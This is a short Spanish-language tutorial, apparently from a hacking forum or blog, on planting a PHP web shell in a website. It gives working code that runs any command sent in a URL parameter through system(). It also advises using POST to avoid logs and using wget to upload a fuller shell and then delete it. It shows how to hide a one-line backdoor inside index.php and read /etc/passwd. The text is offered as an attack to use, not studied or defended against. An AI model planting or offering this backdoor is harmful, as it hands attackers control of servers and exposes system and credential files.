Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El código sería así:
<form method="GET" action="">
<input type="text" name="comando">
<input type="submit" value="enviar">
</form>
<?php
if(isset($_GET['comando'])){
$var = system($_GET['comando']);
echo $var;
}
?>
En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:
Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.
En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecutó satisfactoriamente.
Otra cosa que podemos hacer es poner
$lol = @<a href="http://www.php.net/system">system</a>($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat /etc/passwd
Espero les haya servido.
Saludos.
